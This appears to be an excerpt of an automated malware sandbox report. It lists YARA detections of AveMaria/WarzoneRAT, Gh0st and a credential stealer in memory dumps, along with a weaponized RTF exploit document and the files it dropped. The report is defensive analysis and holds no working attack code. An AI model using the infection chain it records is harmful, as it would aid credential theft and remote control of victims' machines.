          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drStream path '_1725425945/\x1Ole10Native'
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drStream path '_1725426018/\x1Ole10Native'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe
          Source: DZdtfhgYgeghD{.scTStatic RTF information: Object: 0 Offset: 000007D1h DZdtfhgYgeghD{.scT
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_001900C8
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_00197650
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_00197219
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_00197228
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_00197640
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_001907EE
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_0131A760
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_01310048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_05890048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B00C8
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B7650
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B7228
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B7219
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B7640
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B07E0
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_04E09850
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_04E00042
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_04E00048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F00048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F00038
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_001F00C8
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_001F7650
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_001F7219
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_001F7228
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_001F07E0
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_01329850
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_01320048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_05500048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_05500006
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: explorer[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: explorer.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: eDdYRRbouy.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77740000 page execute and read and write
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLEMatched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
          Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
